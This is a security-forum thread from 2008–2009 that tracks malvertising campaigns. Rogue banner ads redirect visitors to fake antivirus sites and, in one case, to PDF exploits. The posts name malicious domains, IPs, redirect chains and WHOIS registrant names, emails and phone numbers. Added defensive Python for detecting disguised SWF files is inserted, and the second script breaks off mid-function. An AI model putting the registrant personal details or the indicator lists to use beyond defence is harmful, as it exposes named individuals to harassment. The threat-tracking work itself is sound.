Rogue Banner Ads [extrabanner.com [Sept 20]

The latest malware threats from across the security forums


User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads

Postby TeMerc » Wed Nov 19, 2008 8:23 pm

ALERT: Two malvertizements seen at Skydrive and Hotmail...
Kimberley saw the first one, a malvertizement featuring perfectmatch.com.

I have discovered another malvertizement featuring IMIN - we have seen this advert several times in recent days in different places.

Details of hijack:

IMIN malvertizement undetectable using adopstools
http://www.adopstools.com/index.asp?pag ... 37aZeMUVbT

Encrypted dynamic text in use

Hash: 11c8f432a9e70c56a171ddfa9df43a3a

Refers victims user to this URL (SWF disguised as GIF)
optimizedby.net/__utm.gif?<<snipped>>

Scans malicious at adopstools
http://www.adopstools.com/index.asp?pag ... 21nJm6q02M

Hash: d730fba801a56311f9cf73587826821a

Leads victim to fraudware domains, including windows-scannercenter.com/?id=<<snipped>>
0-= More @ Spyware Sucks

Re: Rogue Banner Ads [On SkyDrive & Hotmail [Nov 20]

Postby TeMerc » Thu Nov 20, 2008 3:36 pm

WARNING: allrecipes.com - Rhapsody MP3 Store
Today, 02:36 PM

A new way of redirecting people to fake online scanners is occurring at All Recipes aka allrecipes.com. A jpg image featuring Rhapsody MP3 Store is being displayed and people are redirected to Antivirus 2009.

Campaign:
    www.prolinar.com/?id=10810121545881960
    juwiline.com/?id=10810121545881960
    http://www.lynix-star.com/banners-db/Rhapsody/Rhapsody_728x90_1.jpg
    juwiline.com/stats/?id=10810121545881960
    juwiline.com/includes.js
    clicksoverview.com/soft.php?aid=
        &d=6&product=XPA&refer=
    antivirusdefense.com/2009/1/en/freescan.php?id=
0-= Complete Detailed Analysis @ Bluetack Internet Security Solutions

Re: Rogue Banner Ads [On SkyDrive & Hotmail [Nov 20]

Postby TeMerc » Sun Nov 23, 2008 6:20 pm

ALERT: Malvertizement at Expedia.com

Details here:
http://www.mikeonads.com/2008/11/23/mal ... xpediacom/

It looks identical to the malvert at allrecipes.com discussed here:
http://www.bluetack.co.uk/forums/index. ... &p=89945&#

Some of the same domains are used, prolinar.com and clicksoverview.com. The fraudware domain is also the same, antivirusdefense.com.

prolinar.com:
ICANN Registrar: ESTDOMAINS
Created: 18 November 2008
NS57.1AND1.COM
NS58.1AND1.COM
IP: 74.208.131.124 - United States - 1&1 Internet Inc
Registrant: Thomas Schultz (ts8317ATgooglemail.com)

vernariostar.com:
ICANN Registrar: NETFIRMS INC
Created: 20 November 2008
NS1.NETFIRMS.COM
NS2.NETFIRMS.COM
IP: 38.113.185.172 - United States - Performance Systems International Inc
Registrant: No WHOIS details

triesto.com:
ICANN Registrar: ESTDOMAINS INC
Created: 20 November 2008
NS57.1AND1.COM
NS58.1AND1.COM
IP: 74.208.131.124 - United States - 1&1 Internet Inc
Registrant: Andy Borman, Copress (andybormATgooglemail.com)

0-= Continued Details @ Spyware Sucks

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:22 pm

ALERT: new malvertizement featuring "Sell Your Home"
Detectable by Adopstools:
http://www.adopstools.net/index.asp?pag ... G889AVz3Tf

Malvertizement touches:

2layerads.net/_stat.gif?src=<<snipped>>

You may note that the URL seems to be downloading a "GIF". It is not. It is downloading a "SWF" (using the same trickery that has been seen with _utm.gif which also proved to be a SWF).

_stat.gif (which is a SWF) is detectable via adopstools:

http://www.adopstools.net/index.asp?pag ... zj1N328997

So, who are 2layerads.net? Well, for starters they have been implicated in malvertizement incidents in the past.

Back when we were reporting on adtechie and its activities, 2layerads.net had an open WHOIS and was hosted by Cernel at 64.28.187.23:

2layerads.net as at 15 November 2008 - 64.28.187.23

Updated Date: 11-nov-2008
Creation Date: 24-mar-2008
Registrar: ESTDOMAINS, INC.
Name Server: NS.2LAYERADS.NET
Name Server: NS2.2LAYERADS.NET
0-= Continued @ Spyware Sucks
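The posts above describe the same disguise twice: a URL that ends in .gif (`__utm.gif`, `_stat.gif`) but actually serves a Flash SWF. The extension is only a name; the first bytes of the object say what it is. The following is an added example, not code from the forum or from the Spyware Sucks blog, showing how a defender can sniff GIF and SWF signatures on fetched ad objects, decode the SWF header, and flag a name/content mismatch. The sample byte strings are constructed for the example and are not real ad files.

```python
import struct
import zlib

# Magic bytes: the first bytes of a file identify its real format regardless of
# the extension in the URL. GIF and SWF signatures are from the public format specs.
GIF_MAGIC = (b"GIF87a", b"GIF89a")
SWF_MAGIC = {b"FWS": "uncompressed", b"CWS": "zlib-compressed", b"ZWS": "lzma-compressed"}


def sniff(data: bytes) -> str:
    """Classify a served object by its leading bytes, ignoring the claimed extension."""
    if data[:6] in GIF_MAGIC:
        return "gif"
    if data[:3] in SWF_MAGIC:
        return "swf"
    return "unknown"


def parse_swf_header(data: bytes) -> dict:
    """Decode the 8-byte SWF header: signature, version, declared uncompressed length."""
    sig = data[:3]
    if sig not in SWF_MAGIC or len(data) < 8:
        raise ValueError("not an SWF header")
    version = data[3]
    declared_length = struct.unpack("<I", data[4:8])[0]
    return {
        "signature": sig.decode("ascii"),
        "compression": SWF_MAGIC[sig],
        "version": version,
        "declared_length": declared_length,
    }


def swf_body(data: bytes) -> bytes:
    """Return the tag stream after the header, inflating CWS files (LZMA ZWS is not handled here)."""
    sig = data[:3]
    if sig == b"FWS":
        return data[8:]
    if sig == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("unsupported or non-SWF input")


def check_served_object(claimed_name: str, data: bytes) -> dict:
    """Compare the extension a URL advertises with what the bytes actually are.

    A mismatch (a path ending in .gif whose bytes start with FWS/CWS) is the
    disguise described in the posts above and is worth alerting on.
    """
    ext = claimed_name.rsplit(".", 1)[-1].lower() if "." in claimed_name else ""
    actual = sniff(data)
    result = {"claimed": ext, "actual": actual, "mismatch": actual != "unknown" and actual != ext}
    if actual == "swf":
        result["swf"] = parse_swf_header(data)
    return result


# Constructed samples (not real ad files): a tiny uncompressed SWF, the same
# payload zlib-compressed, and a minimal GIF, each "served" under a .gif name.
SWF_TAGS = b"\x00" * 5
FAKE_GIF_SWF = b"FWS" + bytes([9]) + struct.pack("<I", 8 + len(SWF_TAGS)) + SWF_TAGS
FAKE_GIF_CWS = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(SWF_TAGS)) + zlib.compress(SWF_TAGS)
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x00\x00" + b"\x3b"

if __name__ == "__main__":
    for name, blob in (("__utm.gif", FAKE_GIF_SWF), ("_stat.gif", FAKE_GIF_CWS), ("logo.gif", REAL_GIF)):
        print(name, check_served_object(name, blob))
```

Running the block prints a mismatch for both fake "GIF" names and none for the real GIF. The same check applies to a proxy log or an ad-tag crawler: compare the content sniffed from the response body against the extension and the `Content-Type` the ad server claims, rather than trusting either.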

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:24 pm

ALERT: treat all content from Olympic Media (olympicmedia.net) with extreme caution
Olympic Media has been caught distributing malvertizing ... again (thanks to Kimberley for the heads up).

Why do I say again? Because a usatoday representative posted to my blog back in September claiming that Olympic Media had sold them a malvertizement.

Anyway, back to present day. This time Olympic Media are distributing a cyberipod malvert.

When the advert is run, it reaches out to two domains - freegreenstats.com and statisticsmanager.com.

statisticsmanager.com drops a cookie for adnetserver.com before leading us to onlinestatsmanager.com. From there we end up at online-info-clicks.com, which is the first URL that exposes the victim to fraudware. online-info-clicks.com redirects the victim to anti-virus-live-scan.com.
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [On Expedia[Nov 23]

Postby TeMerc » Tue Dec 09, 2008 6:28 pm

Malvertizing at variety.com?
Cite: http://www.google.com/support/forum/p/W ... b298&hl=en

I disagree with the theory being espoused by some in that thread (that the site is hacked and/or htaccess has been manipulated). This is because:

the thread author is complaining that the redirects are occurring as he browses the site
it is not affecting anybody else who has posted to the thread
Such symptoms lead me to believe that there is malvertizing being displayed somewhere on the site - I agree with jwp_var. It is interesting that the behavior only seems to affect Firefox...

The complained-of URL, proweb-info.com/soft.php?aid=075676&d=1&product=XPA&refer=dc77b3921 is definitely bad, leading the victim to the fraudware site advancedproscan.com.
0-= Spyware Sucks

Re: Rogue Banner Ads [variety.com/olympicmedia.com[Dec 12]

Postby TeMerc » Wed Dec 10, 2008 10:44 pm

ALERT: malvertizement featuring Best Western
Published Thursday, December 11, 2008 10:58 AM by sandi

Sites involved:
    onlinestatsmanager.com
    protected-web-space.com
    scan.freeantispyware-scanner.com
    system-scanner.org
0-= Spyware Sucks

Re: Rogue Banner Ads [Best Western[Dec 13]

Postby TeMerc » Sat Dec 13, 2008 8:09 am

ALERT: Treat all content from Servedad with extreme caution

I have said it before, but I'll say it again - PLEASE TREAT ALL CONTENT FROM SERVEDAD WITH EXTREME CAUTION!!

They look innocent enough *today* if you check their WHOIS. The ICANN Registrar is listed as Regtime, the domain created in June 2007, Registrar is a "Tom Reber" (tomasreber@yahoo.com) and the name is not associated with any other domains, but I can tell you without a doubt that Servedad are bad.

Putting aside the fact that they have been caught doing bad things before, more than once, it becomes obvious that they should be treated with caution when we look at the history of the domain. Back in May of this year, these were the WHOIS details:

ICANN Registrar: Estdomains
Name servers: managedns4.estboxes.com (and managedns.3, .2 and .1)

In May, other WHOIS details were hidden behind privacyprotect, but then the domain lost its protection and a "Javier Vega" (softjoda@yahoo.com) was exposed (yes, the name and email address are familiar).

0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [Servedad[Dec 13]

Postby TeMerc » Sun Dec 14, 2008 11:16 pm

safepaymentsonline.com - down the rabbit hole we go...

I have been taking a look at the site safepaymentsonline.com because a report of naughtiness was received. Here is what I found:

Current WHOIS:


ICANN Registrar: TLDS, LLC DBA SRSPLUS
Domain created: 8 April 2008
NS1, 2, 3, 4.SAFEPAYMENTSONLINE.COM
IP: 216.195.56.148 (Oregon - Portland - Aps Telecom)
Registrant: Markus Simpson (further details hidden behind SRSPlus Private Registration)
Sharing IP with 29 domains:
    1softwarespot.com,
    Adult-billing.com
    Bestsoftclub.com
    Billhlp.com
    Billingcenteronline.com
    Billinghost.net
    Billingintegrator.com
    Billingmill.com
    Billingserviceonline.com
    Billingsquad.net
    Billinternet.com
    Billsvc.com
    Customerhlp.com
    Dopaymentsonline.com
    Ebillingcenter.com
    Fantazybill.com
    Interbills.com
    Justnetbilling.net
    Legalbillingsystems.com
    Mainbillingcenter.com
    Megafixer.com
    Orderhlp.com
    Paymentbit.com
    Paymentbit.net
    Paymentforge.com
    Safepaymentsonline.com
    Softwbill.com
    Spankyhosting.com
    Support-wizard.com
    Truebillingservices.com
0-= Continued Detailed Analysis @ Spyware Sucks

Re: Rogue Banner Ads [safepaymentsonline.com[Dec 15]

Postby TeMerc » Sun Jan 04, 2009 7:48 pm

ALERT: traffichunter.net and traffichunters.net – spot the similarities to Olympic Media

I think it is fair to say that all content from traffichunter.net and traffichunters.net should be treated with extreme caution.

First of all, I received an email warning me that there are remarkable similarities between the Olympic Media web site and the Traffic Hunter(s) web site (and we already know that Olympic Media has been implicated in the distribution of malvertizements). There are screenshots evidencing the remarkable similarities at the end of this article.

Secondly, my correspondent described the references supplied by Traffic Hunters as being “fishy”.

Thirdly, the WHOIS details for traffichunter.net and traffichunters.net raise suspicion – traffichunter.net and traffichunters.net share an IP address but have completely different WHOIS details. Not only that, traffichunters.net has WHOIS details identical to another domain that hosted (hosts?) a web page which tries to infect computers via various security exploits (cite: bluetack.co.uk URL below).

Traffic Hunter’s office is apparently in Poland - Nowowiejska Str. 12, Room 36, Warsaw, Poland to be exact.

traffichunter.net
ICANN Registrar: NAME.COM LLC
Created: 25 September 2008
NS1.TRAFFICHUNTER.COM
NS2.TRAFFICHUNTER.COM

IP: 72.232.107.19 - New York, Layered Technologies Inc

Registrant: Jeann Covergale Petroleum (jeann.petroleum@yahoo.com)
339 St Paul Street, Kamloops, Vancouver BC
Note: It is worth noting that the Coast Canadian Inn is located at the address claimed by the traffichunter.net Registrant

0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [traffichunters.net\.com[Jan 5]

Postby TeMerc » Wed Jan 14, 2009 10:35 pm

Glowing brain malvertizement – and, once again, we find DIRECTI

Adopstools results:
http://www.adopstools.net/index.asp?pag ... ay36mabrK0

Touches the domain adclickmate.net:
Registrar: DIRECTI (yet again)
Created 24 March 2008
NS1.ADCLICKMATE.NET
NS2.ADCLICKMATE.NET

IP: 212.95.37.133 - Germany, Netdirekt
WHOIS hidden behind privacy protect

Domain originally registered via ESTDOMAINS - WHOIS protection temporarily removed around late August 2008, which revealed:


Domain Corp.
Jacob Tua (jackyouthere@gmail.com)
Maltiskam 12-67
Belgrade
Belgrade, 11008
RS
Tel: +381.113114094

Later changing to:

Domain Names copr.
markhaagland@gmail.com
Tallin
Harjumaa, 13514
EE
Tel. +37.26201114
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [DIRECTI[Jan 15]

Postby TeMerc » Fri Jan 16, 2009 10:53 am

ALERT: Please treat all content from topstarmedia.net and osmedlin.com with extreme caution
- do we find DIRECTI? Yes we do!
I received an email alert today reporting that topstarmedia.net is supplying JavaScript code for advertising campaigns as follows:

osmedlin.com/?id=<<removed>>

To quote my correspondent, topstarmedia’s approach had "all the hallmarks - 5 figure budget, launch on a Friday, immediately, etc."

topstarmedia.net
ICANN Registrar: Oneandone
Created: 31 August 2008
nserver: ns2.3fn.net 216.195.48.10

nserver: dns346.3fn.net 216.195.56.230

IP: 216.195.57.52 - Oregon - Portland - Aps Telecom

WHOIS hidden behind "Private Registration"

According to Google Maps, topstarmedia.net shares its stated address (518 W 6th St, Los Angeles, CA 90014 United States) with a pizza shop and locksmith :-)

0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [DIRECTI[Jan 15]

Postby TeMerc » Mon Feb 02, 2009 12:13 am

Olympic Media are still active
I’ve warned about Olympic Media several times – they continue to be active.

The latest reports indicate they are claiming to be operating out of Canada and are supplying javascript code referring to admin.securityclick.net.

Other domains being used are onlinepromostats.com and admediastats.com.
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Wed Mar 11, 2009 12:10 am

ALERT: New malvertizement featuring Bausch & Lomb Softlens contact lenses
I have seen multiple, visually identical, versions of the malvertizement shown above, one of which has revealed a new name and domains. Please be on the look-out.

One sample that I received today is effectively neutralized because the malvertizement hits the domains of-ficialstat.com and securityclick.net, both of which are not resolving.

securityclick.net is a "Serg Moons" domain, which is currently "on hold" (aka locked) :o) The domain is no longer resolving, but its last IP address was 212.117.165.128.

The next sample I examined hits the following domains - cosmotraf.net and pleaselinkmeto.com - two domains that I have not encountered before. This campaign is live.

Once the redirect is triggered we hit a URL at traff-direct.com. We are then redirected to go-uniq.com before we hit the fraudware domains removespywarethreats.com or desktoprepairpage.com or pcantimalwaresolution.com.
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Fri Mar 13, 2009 1:04 am

ALERT: please treat the domains hit-detect.com and statsnclick.com with extreme caution

Both are new domains associated with the Registrant "Gabriel Jenks". Regular readers of my blog will know that "Gabriel Jenks" is a name associated with several malvertizement related domains in recent times, including measurehits.com and statisticsishere.com

Web sites in the same IP range: addded.com, banner-count.com, lineacount.com, lineweather.com, mypersonalhttp.com, tangoing.info, tinnily.info, unmarine.info, warwork.info, wovens.info.
0-= Continued @ Spyware Sucks
=======================================================================
Alert: please treat all content from hitoptimist.com with extreme caution
Seen in association with malvertizing incidents - measurehits.com used in same malvertizing campaigns.

hostnames sharing ip with a-records:
    cosmotraf.net
    download.pcprivacycleaner.com
    download.powerfulvirusremover2008.com
    static.88-198-8-15.clients.your-server.de
    sw.effectiveload.com
    ydmstats.com
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Tue Apr 14, 2009 11:13 am

ALERT: Please treat advertising content from checkm8.com with extreme caution
Reported to checkm8.com over 9 hours ago.

Checkm8.com is serving several malicious advertisements that hijack web site visitors and redirect them to various fraudware web sites as follows.

logiagroup.checkm8.com/data/478089/HP_728x90.swf
logiagroup.checkm8.com/data/478091/HP_468x60.swf
logiagroup.checkm8.com/data/479231/HP_300x250.swf
logiagroup.checkm8.com/data/479237/HP_728x90.swf

SWF analysis via Adopstools:

adopstools.com/index.asp?section=quicklink&id=950rk4Ik9bh3WaWF
adopstools.com/index.asp?section=quicklink&id=I7c2TVDD2X6zf9I7
adopstools.com/index.asp?section=quicklink&id=1bB5k3GOLOvb5iSN
adopstools.com/index.asp?section=quicklink&id=aD6g49HnzyF8anGV

Further information:

logiagroup.checkm8.com/data/478089/HP_728x90.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/478091/HP_468x60.swf touches the following URLs:

hit-detect.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/479231/HP_300x250.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

logiagroup.checkm8.com/data/479237/HP_728x90.swf touches the following URLs:

hitoptimist.com/c/index.php?id=<<redacted>>
measurehits.com/?cmpid=<<redacted>>

Domain details:

hitoptimist.com:
ICANN Registrar - COMMUNIGAL COMMUNICATIONS LTD
Created 10 March 2009
DNS1.COMMUNIGAL.NET
DNS2.COMMUNIGAL.NET

IP: 88.198.8.15 - Bayern - Gunzenhausen - Hetzner-rz-nbg-net

Sharing IP address with cosmotraf.net, hit-detect.com, statisticsishere.com and ydmstats.com (all domains should be treated with extreme caution)
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [Olympic Media[Feb 2]

Postby TeMerc » Thu Apr 16, 2009 12:52 am

ALERT: Please treat advertising from beyond.com with extreme caution
Note: the malicious SWF has been reported to beyond.com.

Beyond.com is displaying a malicious advertisement with this URL:
ads.beyond.com/banners/jobfox_468x60.swf

Eventually the victim ends up at one of several fraudware URLs, including:
    removespywarethreats.com/<<redacted>>
    desktoprepairpackage.com/<<redacted>>
    pcantimalwaresolution.com/<<redacted>>
    total-virusprotection.com/<<redacted>>
    offer-provider.com/<<redacted>>
0-= Continued @ Spyware Sucks Blog

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Fri Apr 17, 2009 11:46 pm

ALERT: Please treat advertising from letssingit.com with extreme caution
Note, the malvertizement was reported to “kraz”, who is apparently responsible for advertising on the letssingit.com web site, a couple of days ago via the "Advertise on letssingit” contact form, to no avail.

letssingit.com is hosting a malicious advertisement featuring SWATCH as per this URL:
includes.letssingit.com/ads/SWATCH300x250.swf

Adopstools check:
http://www.adopstools.net/index.asp?sec ... VapP174q1A

The malvert hits some well known bad domains, being cosmotraf.net and welovesandi.com.

From there we bounce through various domains, including crustat.com, olinredr2.com, truconv.com, top-name.cn, pyani.com before ending up at one of several fraudware sites including offer-provider.com and total-virusprotection.com.
0-= Spyware Sucks Blog

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Wed Apr 22, 2009 11:10 am

ALERT: Please treat advertising at clevescene.net with extreme caution
Same old same old. A Rhapsody advertisement. Reported to clevescene.

URL of malvertizement:
72.167.208.179/adserver/www/images/rhapsody728x90.swf

Adopstools results confirming malicious code:
http://www.adopstools.com/index.asp?sec ... r1bK1W3pv3

URLs encountered:
hitoptimist.com/crossdomain.xml

and:
hitoptimist.com/c/index.php?<<redacted>>

as well as:
statsnclick.com/?cmpid=<<redacted>>

From there we end up at:
crustat.com/ts/in.cgi?<<redacted>>

Before ending up at:
pnfzetnax.net/pro/uspremorse/

Before ending up at the fraudware site:
78.47.132.220/cr/adv/142/index.html
0-= Spyware Sucks

Re: Rogue Banner Ads [beyond.com [Apr ]

Postby TeMerc » Thu Apr 23, 2009 4:32 pm

PLEASE TREAT ALL CONTENT FROM PERFECT-BANNER.COM WITH EXTREME CAUTION
Adopstools scan results:
http://www.adopstools.net/index.asp?sec ... vFRC85pkp7

Malvertizement host:
perfect-banner.com

Hits the domains statcluster.com and enjoyspringtime.com

From there to crustat.com, pnfzetnax.net (or justwebsecurity.com), then to 78.47.132.220.

-----

perfectbanner.com


ICANN Registrar: ENOM, INC.
Created 10 March 2009
NS1.PERFECT-BANNER.COM
NS2.PERFECT-BANNER.COM
NS3.PERFECT-BANNER.COM
NS4.PERFECT-BANNER.COM

IP: 89.149.244.137 - Hessen, Frankfurt Am Main, Netdirekt E.k

Shares IP with one other site, being 4netbanners.com - please treat the domain 4netbanners.com with extreme caution
0-= Continued @ Spyware Sucks

Re: Rogue Banner Ads [PERFECT-BANNER.COM [Apr 23]

Postby TeMerc » Tue Apr 28, 2009 12:17 am

Further information regarding the malvertizements touting ebay discovered at perezhilton.com

The malvertizement redirects victims to various fraudware/scareware products via several redirects (some of the URLs change at random – victims don’t hit all of the domains listed below).

These are the URLs that are hit by the malvertizement – we have seen all of them before:
    statcluster.com/crossdomain.xml
    statcluster.com/c/index.php?id<<redacted>>
    crustat.com/ts/in.cgi?<<redacted>>
    olinredr2.com/?accs=<<redacted>>
    pyani.com/in.cgi?<<redacted>>
    offer-provider.com/<<redacted>>
    truconv.com/<<redacted>>
    justwebsecurity.com/<<redacted>>
Final destinations:
offer-provider.com is a fraudware domain touting fake security software under various names such as "SpywareRemover" and "VirusRemover2009" and "AntiSpywareSolution 2009".

trueconv leads to the fraudware total-virusprotection.com.

justwebsecurity.com leads to a fake "System Security" scanning page
0-= SpywareSucks
=======================================================

More information about the malvertizements that appeared on guardian.co.uk and electronicsnews.com.au
There are two malvertizements that I highlighted, being:

m1.au.2mdn.net/1949664/hp_300x250.swf
m1.emea.2mdn.net/989589/hp_728x90.swf

The 300x250 malvert touches hit-detect.com and measurehits.com.
The 728x90 malvert touches ydmstats.com and measurehits.com.

Redirects:
We go from measurehits.com to crustat.com.

From there we go to one of several different domains:
    olinredr2.com/<<redacted>>
    truconv.com/<<redacted>>
    free-webscaners.com/<<redacted>> <--- fraudware domain
If a victim is redirected to olinredr2.com then they end up at pyani.com, then offer-provider.com. offer-provider.com is a fraudware domain touting fake security software under various names such as "SpywareRemover" and "VirusRemover2009" and "AntiSpywareSolution 2009".

If a victim is redirected to truconv.com then they end up at total-virusprotection.com, another fraudware domain.
0-= Spyware Sucks

Re: Rogue Banner Ads [PERFECT-BANNER.COM [Apr 23]

Postby TeMerc » Thu Apr 30, 2009 10:53 am

ALERT: Malvertizement featuring Crawler
Same old same old. The malvertizement hits the domains statcluster.com and enjoyspringtime.com (both domains have been mentioned on this blog several times).

The Adopstools results make it obvious that there is something suspicious:
http://www.adopstools.net/index.asp?sec ... 36S016WwBW

From statcluster.com and enjoyspringtime.com we end up at crustat.com then on to either free-webscaners.com or truconv.com or olinredr2.com

From olinredr2.com to pyani.com to offer-provider.com

From trueconv.com to total-virusprotection.com
0-= Spyware Sucks

Re: Rogue Banner Ads [CRAWLER[Apr 30]

Postby TeMerc » Mon May 04, 2009 11:36 pm

Malvertizments Impersonating Classmates.com

Reported by Kimberley:
http://www.bluetack.co.uk/forums/index. ... st&p=91839

The malvertizements are very familiar, yes?

Now, we already know that a known bad actor, yourdirectmedia, has supplied "Classmatesmedia, Rick Harris, 619 949 8952" as a referee. We also suspect (I have not had this independently confirmed) that classmatesmedia does not directly sell advertising - rather, I believe that United Online Advertising Solutions is responsible for that chore (uolmediagroup.com).

How much do you want to bet that somebody impersonating classmates.com, or falsely claiming to represent them, is responsible for these malvertizements?
0-= Continued @ Spyware Sucks
================================================================
0-= Updated

Re: Rogue Banner Ads [CRAWLER[Apr 30]

Postby TeMerc » Wed May 20, 2009 11:39 pm

ALERT: Please treat advertising from Gilmours Media (gilmoursmedia.com) with extreme caution

They have been caught distributing malvertizing.

It should be noted that gilmoursmedia.com was originally registered via the infamous ESTDOMAINS, to a "Jacob Tua" of Maltiskam 12-67, Belgrade, 11008, telephone +381.113114094.

More importantly, the email address for "Jacob Tua" was "jackyouthere@gmail.com". See this Apple discussion forum conversation about the clipboard hijacking problem – the same clipboard hijacking problem that led to Adobe changing the way Flash behaves:
http://discussions.apple.com/thread.jsp ... ID=7768848

The domain being copied to clipboard via the Flash exploit was "windowsxp-privacy.net", which just so happened to be registered to, you guessed it, jackyouthere@gmail.com!! This information was posted to the discussion thread on 20 August 2008.
0-= Continued @ Spyware Sucks Blog
===============================================================
3 malvertizements

All created using, we think, Fuse – all use the encrypted-code-as-dynamic-text trick.

Malvertizement 1 (reported by Greg Feezel) and seen on Fox Audience Network:
Hits bigstat.net
ICANN Registrar: REGTIME LTD
Created 18 February 2009
NS1.NAMESELF.COM
NS2.NAMESELF.COM

IP: 212.95.32.166 - Berlin, Netdirekt

Shares IP with greatstat.com

Registrant - bigstat.net and greatstat.com
Anemari Rotko (ranemari@yahoo.com)
Tulskaya, 247/14
Moscow, 109029, Russia
+7 495 364 9627

0-= Continued @ Spyware Sucks Blog

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Mon Jul 13, 2009 10:43 am

ALERT: Please treat content from antventure.com, yellowlinebanner.com, redhousebanner.com, t.banner0709.com and knocklis.com with extreme caution

Normally when I write about malvertizing on this blog, the “goal” of the malvertizement has been to expose victims to fake security software (aka fraudware). In one case, the “goal” was to expose the victim to a pornographic web site (complete with streaming video and sound on the opening page – mlb.com was hit by that one).

Today I saw a malvertizement that did not expose victims to fake security software, or unwanted pornography. Instead, it exposed victims to a web site that tried, via various security exploits, to infect computers.

If a victim is exposed to the dangerous content via the malvertizing discovered today, a malicious PDF is downloaded, which takes advantage of two exploits affecting Adobe Acrobat and Adobe Reader (CVE-2008-2992 and CVE-2009-0927). These vulnerabilities are used to try to download even more malicious software via a web page.

0-= Continued @ Spyware Sucks


Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Tue Jul 14, 2009 12:33 am

ALERT: malvertizement featuring “Blue Nile”

The SWF advertisement pictured above retrieves content from the domain adburau.net. That content is yet another SWF. At time of writing, the SWF downloaded from the domain adburau.net was a single frame SWF with no images, or shapes, or fonts, or texts, no sounds, or videos, or buttons, or sprites, or scripts.

Let’s take a close look at adburau.net – we dig up some interesting information.

adburau.net
ICANN Registrar: DIRECTI
Created: 21 September 2008
NS1.ADBURAU.NET
NS2.ADBURAU.NET

IP: 212.95.37.133 - Netdirekt, E.k

Registrant:
Al Jabber
Said Fahtihma (saidfahtih@gmail.com)
A. Kodiri, 65
Tashkent
Kishlak, 100060
UZ
Tel: 998.348.754.198

Hostnames sharing IP with a-records:

212-95-37-133.internetserviceteam.com
adclickmate.net
ns1.adclickmate.net
ns2.adclickmate.net

0-= Continued @ Spyware Sucks
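The Blue Nile post above says the SWF fetched from adburau.net was a single-frame file with no shapes, text, sound or script, and the earlier "3 malvertizements" post says the Fuse-built creatives hide their code as dynamic text. Both statements can be checked offline by walking the SWF header and tag list. The script below is an added example, not the Spyware Sucks author's tooling: the tag codes are the subset of Adobe's published SWF file format that matters here, and the two sample files are constructed by the script itself (dummy payloads, 300x250 stage), not captured creatives.

```python
"""Walk a SWF header and tag list to tell a content-free loader shell from a
creative that carries text fields and ActionScript.  Sample files are built
below; nothing here is fetched."""
import struct
import zlib

TAG_NAMES = {0: "End", 1: "ShowFrame", 2: "DefineShape", 9: "SetBackgroundColor",
             12: "DoAction", 26: "PlaceObject2", 34: "DefineButton2",
             37: "DefineEditText", 39: "DefineSprite", 41: "ProductInfo",
             43: "FrameLabel", 59: "DoInitAction", 65: "ScriptLimits",
             69: "FileAttributes", 76: "SymbolClass", 77: "Metadata", 82: "DoABC",
             86: "DefineSceneAndFrameLabelData", 87: "DefineBinaryData"}
INERT = {0, 1, 9, 41, 43, 65, 69, 77, 86}        # draw/play/run nothing
SCRIPT_BEARING = {12, 34, 37, 59, 76, 82, 87}   # ActionScript, or data for it


def _read_rect(buf):
    """RECT = 5-bit field width, then xmin/xmax/ymin/ymax (signed, in twips)."""
    nbits = buf[0] >> 3
    total = 5 + 4 * nbits
    nbytes = (total + 7) // 8
    bits = int.from_bytes(buf[:nbytes], "big") >> (nbytes * 8 - total)
    mask = (1 << nbits) - 1
    vals = []
    for i in range(4):
        v = (bits >> ((3 - i) * nbits)) & mask
        vals.append(v - (1 << nbits) if nbits and v >> (nbits - 1) else v)
    return vals, nbytes


def parse_swf(data):
    sig, version = data[:3], data[3]
    if sig not in (b"FWS", b"CWS"):                # e.g. a GIF, or a SWF served as .gif
        raise ValueError("not a SWF, signature %r" % sig)
    declared_len = struct.unpack_from("<I", data, 4)[0]
    body = zlib.decompress(data[8:]) if sig == b"CWS" else data[8:]
    (xmin, xmax, ymin, ymax), pos = _read_rect(body)
    frame_rate = struct.unpack_from("<H", body, pos)[0] / 256.0   # 8.8 fixed point
    frame_count = struct.unpack_from("<H", body, pos + 2)[0]
    pos += 4
    tags = []
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                          # long-form tag header
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append((code, body[pos:pos + length]))
        pos += length
        if code == 0:
            break
    return {"compressed": sig == b"CWS", "version": version,
            "length_ok": declared_len == len(body) + 8,
            "stage_px": ((xmax - xmin) // 20, (ymax - ymin) // 20),
            "frame_rate": frame_rate, "frame_count": frame_count, "tags": tags}


def triage(info):
    codes = [c for c, _ in info["tags"]]
    return {"empty": all(c in INERT for c in codes),
            "has_script": any(c in SCRIPT_BEARING for c in codes),
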